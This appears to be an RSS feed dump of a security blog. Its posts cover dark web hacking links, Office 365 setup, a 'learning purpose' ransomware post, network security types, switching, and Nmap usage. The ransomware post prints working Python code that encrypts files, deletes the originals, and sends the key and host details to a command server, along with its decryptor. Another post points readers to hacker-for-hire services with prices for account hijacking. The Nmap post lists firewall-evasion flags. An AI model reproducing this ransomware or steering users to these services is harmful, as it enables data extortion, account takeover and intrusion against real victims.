Cyberbear https://cyberbear.in Wed, 04 Mar 2026 07:04:56 +0000 en-US hourly 1 https://wordpress.org/?v=6.9.4 https://cyberbear.in/wp-content/uploads/2026/02/cropped-final_logo_cyber_bear__1_-removebg-preview-e1772610647681-32x32.webp Cyberbear https://cyberbear.in 32 32 What Is Dark W https://cyberbear.in/what-is-dark-w/ https://cyberbear.in/what-is-dark-w/#respond Mon, 02 Mar 2026 11:51:46 +0000 https://cyberbear.in/?p=1323 If you are interested in hacking and looking for active deep web links for knowing about hacking tips, hacking services offered at deep web and hackers groups also, then you will love to explore the below collection.

Lots of activities are performed on the deep web related to hacking daily. Below I am sharing some working dark web links for hacking services and hacking tutorials.

Warning: Surfing the dark web with Tor Browser is not safe. Always use Premium VPN Service with Tor Browser. I personally use NordVPN since they have a dedicated Onion Over VPN Server and they beat other VPNs in many features. NordVPN helps you in creating a completely secure and safe environment with an advanced encryption and anonymity layer.

Follow the below steps always while you browsing hacking deep web links.

  • First of all close all working applications in your PC.
  • Start NordVPN and connect Onion Over Server.
  • If the connection has been established then start Tor Browser. And make sure, the version which you are using is the latest Tor Version.

Now all is done and you are ready to visit the given onion links.

Note: I am sharing these hacking links for education purposes only. If you perform any activity, I am not responsible for any harm or damage. It is your own responsibility and risk.

huomyxhpzx6mw74e6jfxtj5kmxov6wdmc62ylk6oc7feht5gntuawaqd – Rent A Hacker – Hacker’sBay – This is a Dark web hacker community that offers hacking services anonymously on the deep web, They offer services in PC Hacking, Social Media Hacking, Emails Hacking, DDoS Attacks, Website Hacking, and much more. But they offer his fee according to services. For example – According to his website, If a user needs social media account hacking like Facebook, Twitter, Instagram then they will charge $350 to $700. for more pricing detail please explore the listed link.

ytteyiazq2xyazjws45lxjpqie5krxdcoe4nr5vysldu54olnbtrg5qd– Hire a Hacker – Pseudo Harmer Hacker

Looking for Hacking services on the Dark Web? Hacker Pseudo Harmer offers exactly that. Unlike some other teams, they do not have a “no go” list. So they probably will hack into any and everything as long as the price is right.

So far they’ve enlisted Cell phones, E-mails, Social media accounts and various databases as their fields of expertise.

Claim delivery before deadline. Orders need to be placed manually. Prices too vary for each job.

wdnqg3ehh3hvalpe – Hacking – Keys open doors: This is truly right, keys open doors but When I check this dark web links status, I do not understand. This dark web sites what is offering when you visit this site hope you can find something good for you.

timaq4ygg2iegci7 – Hacking – Txtorcon: I love this library, this is based on twisted-based Python, if you want to know real-time information about your tor like as circuit, stream, logging hidden services, connect to running Tor circuit and much more. For full information check these dark web links.

hackcanl2o4lvmnv – Hacking – Hack Canads: These dark websites have a good amount of information, when you try to click on the given homepage, each homepage link has a big amount of information. HackCanada offer hacking, cracking, phreaking, payphones, Scams & Rip-Off, FreeDomination, E-Zines, Other Stuff and Canadian Links.

pmwdzvbyvnmwobk5 – Service/Hacking – Barmlab: this darkweb site is indicated to Prague non-profit organization which run hackerspace. Do you want to attend his latest event then check out this site updates regularly?

hackharhoaw3yk5q – Service/Hacker – Hacker for Hire: Do you have any task for which you are looking hacker, and want to complete your task then hacker for hire can provide you that type service. Hacker for Hire can help you in Hacking, Social media threats, Computer spying and surveillance, Remove a link, Locate missing people, Background checks, SSN Trace, Online Dating Scams, Cyber bully & Cyber Stalked, Computer security trainings, Cyber Extortion, Relationship, Tracking, Password and Cyber Fraud.

6dvj6v5imhny3anf – Cyber-Guerrilla

If you want to learn about hacking and looking a place at deep web then this dark web site can be good choice for you. Lots of members are active here with hacking skills; You can go to this website and post your query to get reply from other hackers. You can learn from old thread as well which are on hacking. Feel free to share your experience about this dark web site with us. It will help to provide more accurate info about Cyber-Guerrilla to our readers.

hackerrljqhmq6jb – Hack Group

If you are facing any problem related to hacking like your computer has been hacked, or your social media account has been hacked and scammed at online date website etc. And looking for professional help then you can consider this dark web link. Even they provide some special hacking training also. They charge for every service. You can check their service price at pricing section. And if you need any special service you can contact them using given email at support page. Main services which they offer are hacking, social media threats, computer spying and surveillance, remove a link, locate missing people, background checks, SSN trace, Online dating scams, Cyber bully –cyber stalked, computer security training, cyber extortion, relationships, tracking, passwords and Cyber fraud.

Note: Before buying their services, read reviews about them or discuss about their services in any hacking dark web forum.

hackcanl2o4lvmnv – Hack Canada

Hack Canada is another go to destination at the hidden web to learn hacking. Here are lots of hacking information available. If you are really eager to learn hacking, then visit this dark web link. They have lots of hacking tutorials and documents. Their database is really huge in itself.

vb75uj2ap3hyyava  – Hacking is Art

want to learn some advance technology tips and tricks then must visit this dark web blog link. You can check all covered topics by click on posts. They don’t post much whatever they post have lots of information and quality stull also. Recently cover topics by this dark website are Secure USB boot with Debian, Ethereum GPU Mining on Linux, Amazon MP3 Downloader, and 64-bit Linux, Battlefield 2 with Project Reality on Windows 7 and many more. If these topics interest you, you can visit this hidden onion link to learn more at same topics in deep.

]]>
https://cyberbear.in/what-is-dark-w/feed/ 0
What is Important when we are configuring Office 365 for enterprises or businesses? https://cyberbear.in/what-is-important-when-we-are-configuring-office-365-for-enterprises-or-businesses/ https://cyberbear.in/what-is-important-when-we-are-configuring-office-365-for-enterprises-or-businesses/#respond Mon, 02 Mar 2026 11:50:28 +0000 https://cyberbear.in/?p=1320 First of all, we need a Microsoft office 365 subscription with admin Credentials,

When we subscribe to Microsoft Office 365 service, Microsoft provides admin credentials to us like

Username: xyz@domain.onmicrosoft.com

Password: xyW@#123axsdT

Login Using these credentials to the Microsoft Office 365 admin console from here you need to add your domain to start service on your own,

When you are adding a domain to your Microsoft Office 365 please take care of the following points :

  • MX Records
  • CNAME Records
  • TXT Records

These three files you will get from Microsoft Office 365 you need to add these records over where you have hosted your website or from the domain provider.

MX Records :

A mail exchanger record (MX record) specifies the mail server responsible for accepting email messages on behalf of a domain name. It is a resource record in the Domain Name System (DNS). It is possible to configure several MX records, typically pointing to an array of mail servers for load balancing and redundancy.

CNAME Records

A Canonical Name or CNAME record is a type of DNS record that maps an alias name to a true or canonical domain name. CNAME records are typically used to map a subdomain such as www or mail to the domain hosting that subdomain’s content.

TXT Records

TXT records are a type of Domain Name System (DNS) record that contains text information for sources outside of your domain. You add these records to your domain settings. You can use TXT records for various purposes. Google uses them to verify domain ownership and to ensure email security.

With just these simple records you can start your Microsoft Office 365 Service.

In the upcoming Article, I am coming up with the Microsoft Office 365 essential security setup that I have done for Legalbook I Need to ask for their permission to write a few points of the configuration over here.

]]>
https://cyberbear.in/what-is-important-when-we-are-configuring-office-365-for-enterprises-or-businesses/feed/ 0
Ransomware Code For Learning Purpose Only https://cyberbear.in/ransomware-code-for-learning-purpose-only/ https://cyberbear.in/ransomware-code-for-learning-purpose-only/#respond Mon, 02 Mar 2026 11:47:19 +0000 https://cyberbear.in/?p=1317 It is a virus which encrypt your data with Ransome key post attack of Ransomware all data is get stuck and it cannot be retrieve without  Ransome key it is the Dangerous Malware Of The Decade it is not removable or destroyable as a professional I get a chance to interact with live Ransome attack with a blue team. Over here sharing a code for creating Malware and preventing your device or organization from Ransomware.

First Step is how to prevent yourself from Ransomware because if you try this code with yourself that time it is harmful for your data so take look of following step and then try the code as per tester requirement.

Update your system it is Linux or nay other I was Focused for a Linux 

──(kali㉿kali)-[~]                                                                                                                       

└─$ sudo apt update                                                                                                                    

[sudo] password for kali:                                                                                                              

Ign:1 http://http.kali.org/kali kali-rolling InRelease                                                                     

Ign:1 http://http.kali.org/kali kali-rolling InRelease                                                                     

after Completing the update install a Firewall using 

──(kali㉿kali)-[~]                                                                                                                  

└─$ sudo apt install ufw                                                                                                        

If your using SSH then you need to disable root login after disabling root login restart SSH take a important backup in external location.

Install and Configure ClamAV it is open source free Antivirus for your system

you can download this using simple command

sudo apt install clamav clamav-daemon                                        

Scan and update as a normal

sudo freshclam                                  sudo clamscan -r /                                                          

After completing this process limit to use root instead of root use Sudo for a Administrative use 

For an security purpose I cant share Full code over any platform but over here Encryption and Decryption code shared over here. 

Warning: 

We are not responsible for any loss of data and attack it is users’ responsibility Please Do not run any code unless you are totally understand it. It Was not a complete code but if you want to run this do it at your own risk. This was only for an educational purpose.

Encryption.py

import gc
import os
import json
import uuid
import ctypes
import socket
import subprocess
from cryptography.fernet import Fernet

class RansomwareSimulator:
    def __init__(self, directory, server_host, server_port, file_extensions):
        self.directory = directory
        self.server_host = server_host
        self.server_port = server_port
        self.file_extensions = file_extensions
        self.key = Fernet.generate_key()

    def change_wallpaper(self, image_path):
        if os.name == 'nt':
            ctypes.windll.user32.SystemParametersInfoW(20, 0, image_path , 0)

        else:
            print("Wallpaper change feature is not supported on this OS.")

    def get_mac_address(self):
        mac_num = hex(uuid.getnode()).replace('0x', '').upper()
        mac_num = mac_num.zfill(12)
        mac = ':'.join(mac_num[i: i + 2] for i in range(0, 12, 2))
        return mac


    def create_readme(self):
        desktop_path = os.path.join(os.path.join(os.environ['USERPROFILE']), 'Desktop')
        readme_path = os.path.join(desktop_path, 'Readme.txt')
        with open(readme_path, 'w') as file:
            file.write("This is a simulation program, your files are encrypted.")


    def encrypt_file(self, file_path):
        fernet = Fernet(self.key)
        with open(file_path, 'rb') as file:
            original = file.read()
        encrypted = fernet.encrypt(original)

        encrypted_file_path = file_path + ".denizhalil"
        with open(encrypted_file_path, 'wb') as encrypted_file:
            encrypted_file.write(encrypted)

        os.remove(file_path)
        return encrypted_file_path

    def find_and_encrypt_files(self):
        encrypted_files = []
        for root, _, files in os.walk(self.directory):
            for file in files:
                if any(file.endswith(ext) for ext in self.file_extensions):
                    file_path = os.path.join(root, file)
                    encrypted_file_path = self.encrypt_file(file_path)
                    encrypted_files.append(encrypted_file_path)
                    print(f"Encrypted and saved file: {encrypted_file_path}")
        return encrypted_files

    def get_active_users(self):
        try:
            command = 'query user' if os.name == 'nt' else 'who'
            output = subprocess.check_output(command, shell=True)
            return output.decode(errors='ignore')
        except subprocess.CalledProcessError:
            return "Unable to fetch active users"

    def collect_data(self):
        return {
            'hostname': socket.gethostname(),
            'key': self.key.decode(),
            'active_users': self.get_active_users(),
            'mac_address': self.get_mac_address()
        }

    def send_data_to_server(self):
        data = self.collect_data()
        self.send_to_server(json.dumps(data))

    def send_to_server(self, data):
        try:
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.connect((self.server_host, self.server_port))
                s.sendall(data.encode())
        except:
            quit(0)

    def clear_memory(self):
        gc.collect()
        print("Memory cleared.")

def main():
    file_extensions = ['.txt', '.docx', '.jpg']
    directory = 'dosyalar/'  # 'dosyalar/' should be replaced with the directory path you want to target
    wallpaper_path = r"duvarkağıtı/araba.jpg"
    server_host = '10.0.2.37'
    server_port = 12345

    simulator = RansomwareSimulator(directory, server_host, server_port, file_extensions)
    simulator.find_and_encrypt_files()
    simulator.send_data_to_server()
    simulator.change_wallpaper(wallpaper_path)  # Change the wallpaper
    simulator.create_readme()
    simulator.clear_memory()

if __name__ == "__main__":
    main()

Decryption Codeimport gcimport socketimport jsonimport osfrom cryptography.fernet import Fernetclass Decoder:    def __init__(self, directory, server_host, server_port):        self.directory = directory        self.server_host = server_host        self.server_port = server_port    def decrypt_file(self, file_path, key):        fernet = Fernet(key)        with open(file_path, ‘rb’) as file:            encrypted_data = file.read()        decrypted_data = fernet.decrypt(encrypted_data)        original_file_path = file_path.replace(“.denizhalil”, “”)        with open(original_file_path, ‘wb’) as file:            file.write(decrypted_data)        os.remove(file_path)    def find_and_decrypt_files(self, key):        for root, _, files in os.walk(self.directory):            for file in files:                if file.endswith(“.denizhalil”):                    file_path = os.path.join(root, file)                    self.decrypt_file(file_path, key)    def request_key_from_server(self):        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:            s.connect((self.server_host, self.server_port))            s.sendall(json.dumps({‘request’: ‘key’}).encode())            data = s.recv(1024)            response = json.loads(data.decode())            return response.get(‘key’)    def delete_readme(self):        desktop_path = os.path.join(os.path.join(os.environ[‘USERPROFILE’]), ‘Desktop’)        readme_path = os.path.join(desktop_path, ‘Readme.txt’)        if os.path.exists(readme_path):            os.remove(readme_path)        else:            pass    def clear_memory(self):        gc.collect()        print(“Memory cleared.”)def main():    directory = ‘dosyalar/’  # Replace with the target directory path    server_host = ‘10.0.2.37’    server_port = 12345    print(“Waiting for key…”)    try:        decoder = Decoder(directory, server_host, server_port)        key = decoder.request_key_from_server()        if key:            decoder.find_and_decrypt_files(key)            print(“Files successfully decrypted.”)            decoder.delete_readme()        else:            print(“Key not found or incorrect.”)    except Exception as e:        print(f”An error occurred: {e}\nPlease restart the program.”)    decoder.clear_memory()if __name__ == “__main__”:    main()

Warning: Do Not Run Any of this Code without Knowledge. 

]]>
https://cyberbear.in/ransomware-code-for-learning-purpose-only/feed/ 0
Types of Network Security https://cyberbear.in/types-of-network-security/ https://cyberbear.in/types-of-network-security/#respond Mon, 02 Mar 2026 11:44:41 +0000 https://cyberbear.in/?p=1314 Majour and Important types are as follows :

  1. Access Control 
  2. Antivirus & Antimalware Software 
  3. Cloud Security 
  4. Email Security
  5. Firewalls 
  6. Application Security 
  7. Intrusion Prevention System 

1.Access Control 

                          In this case not every person should have a complete allowance for the accessibility to network & its data. Access is given as per the user’s rights.

2.Antivirus & Antimalware Software 

                  This type of network security ensure that any malicious software like virus ,trojans & worms is handled by the same.

 It Ensures that not only entry of the malware is protected but also that the system is well equipped to fight once it has entered.

3.Cloud Security 

                        Large amount of data stored in cloud this is very vulnerable to the malpractices that few unauthorized dealers might pertain to. This data must be protected but also protection is not jeopardized by anything. Many SaaS companies give access to these data to their employees it creates gaps in security.

4.Email Security 

                        Most of the company has inbuilt security process for example Fraud email directly goes to spam.

5.Firewall

                        Network Security device either Hardware or Software based in some case both. Work of firewall is monitor Incoming & Outgoing traffic based on defined set of rules .IT accept, reject, drop process this is totally based on the Rules. Before firewall Access Control list s used to filter traffic which is known as ACL.

6.Application Security 

                            Application Security denotes the security precautionary measures utilized at the application level. To prevent the stealing or capturing of data or code inside the application.

7.Intrusion Prevention System 

                            Network Security Application that monitors network or system activities for malicious activity. Identify Malicious activity & protect from it is the main feature.

]]>
https://cyberbear.in/types-of-network-security/feed/ 0
Switching https://cyberbear.in/switching/ https://cyberbear.in/switching/#respond Mon, 02 Mar 2026 11:38:03 +0000 https://cyberbear.in/?p=1311 Switching is the process of transferring data packets from one device to another in a network or from one network to another network using a specific device that is called SWITCH.

User experience switching all the time for example accessing the internet from your computer device where a user requests a webpage to open the request is proceed through the Switching of data packets only.

Network Switching 

The switch is a dedicated piece of computer hardware that facilities the process of switching i.e incoming data
packets and transferring them to their destination.

A switch works on the data link layer of the OSI Model 

“”A switch primarily handles the incoming data packet from a source computer or network and decides the appropriate port through which the packet will reach their target computer or network””

Switch decides the port through which the packet shall pass with the help of its destination MAC(Media Access Control) address. A switch does this effectively by maintaining MAC tables(Switching Tables) also known as Forwarding Tables.

Switching Process:

There are 5 steps as follows 

  • Frame Reception: The switch receives a data frame or packet from a computer connected to its ports.
  • MAC Address Extraction: Switch reads the headers of the data frame & collects the destination MAC address from it 
  • MAC Address Table lookup: once the switch has retrieved the MAC address it performs a lookup of its switching tables to find a port that leads to the MAC address of the data frame 
  • Forwarding Decision & Switching Table Update: If the switch matches the destination MAC addresses of the frame to the MAC address in its switching table it forwards the data frame to the respective port. If the destination MAC does not exist switch follows a flooding process in which it sends the data frame to all its ports except the one it came from and records all the MAC addresses to which the frame was delivered by this switch finds the new MAC addresses & updates its forwarding table.
  • Frame Transition: Once the destination port is found the switch sends the data frame to that port and forwarding/forwards it to its target computer/Network.

Type of Switching 

-Message Switching 

-Circuit Switching 

-Packet Switching 

    +Datagram Packet Switching 

    +Virtual Circuit Packet Switching 

Message Switching 

Older switching technique that has become obsolete In it the entire data block/message is forwarded across the entire network thus making it highly ineffective.

Circuit Switching 

In this type of switching a connection is established between the source and destination connection receives the complete bandwidth.

Packet Switching 

Requires the data to be broken down into smaller components data frame or packet. Data frames are then transferred to their destination according to the available resources in the network at a particular time.

        This type is used in computer & internet 

            + Datagram Packet Switching 

                                                    Each data frame is taken as an individual entity and thus they are processed separately there is no connection established before data transmission occurs. Although this approach provides flexibility in data transfer it may cause a loss of data frames or late delivery of the data frames.

            + Virtual Circuit Packet Switching 

                                                     A logical connection between source & destination is made before transmitting data this logical connection is called a circuit.

]]>
https://cyberbear.in/switching/feed/ 0
How Nmap Works? https://cyberbear.in/how-nmap-works/ https://cyberbear.in/how-nmap-works/#respond Mon, 02 Mar 2026 11:21:47 +0000 https://cyberbear.in/?p=1306 Nmap is an Information Gathering tool which scans targeted Ip and provides Port Specification, Services,

Operating System Detection, Scripting Engine (NSE), Aggressive scanning, Output Verbosity, Miscellaneous options.

After doing this scan we get vulnerability in the target and then real game start to hack.

Let’s See how Scan works with commands:


nmap 192.168.1.1

Here’s an example of what the scan results might look like:

bashCopy codeStarting Nmap 7.91 ( https://nmap.org ) at 2024-02-12 15:00 UTC Nmap scan report for 192.168.1.1 Host is up (0.0030s latency). Not shown: 998 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 443/tcp open https Nmap done: 1 IP address (1 host up) scanned in 2.01 seconds
  1. Basic Scanning:
  • nmap <target>: Perform a basic scan on the specified target.
  • nmap -sP <target>: Perform a ping scan to discover live hosts.
  • nmap -sT <target>: Perform a TCP connect scan.
  • nmap -sS <target>: Perform a SYN scan.
  • nmap -sU <target>: Perform a UDP scan.
  1. Port Specification:
  • -p <port1,port2,...>: Specify ports to scan.
  • -p-: Scan all ports (1-65535).
  1. Output Options:
  • -oN <file>: Save scan results in normal format.
  • -oX <file>: Save scan results in XML format.
  • -oG <file>: Save scan results in grepable format.
  • --open: Show only open ports in the output.
  1. Service Version Detection:
  • -sV: Probe open ports to determine service/version information.
  1. Operating System Detection:
  • -O: Enable operating system detection.
  1. Scripting Engine:
  • --script <script>: Run a specific Nmap script.
  • --script-help <script>: Get help for a specific Nmap script.
  1. Timing Options:
  • -T<0-5>: Set timing template (0 for paranoid, 5 for insane).
  1. Aggressive Options:
  • -A: Enable aggressive scan options (service/version detection, OS detection, script scanning).
  1. Scan Techniques:
  • -sV: Service version detection.
  • -sC: Scan using default NSE scripts.
  • -sN: TCP Null scan.
  • -sF: TCP FIN scan.
  • -sX: TCP Xmas scan.
  1. Firewall Evasion:
  • --fragment: Fragment packets to evade firewalls.
  • --badsum: Send packets with bad checksums.
  • --data-length <size>: Append random data to packets.
  1. Miscellaneous:
  • -v: Increase verbosity level.
  • -vv: Increase verbosity level more.
  • -h or --help: Display help message.

Perform passive reconnaissance to collect publicly available information about the target organization, such as domain names, IP addresses, and employee details.

]]>
https://cyberbear.in/how-nmap-works/feed/ 0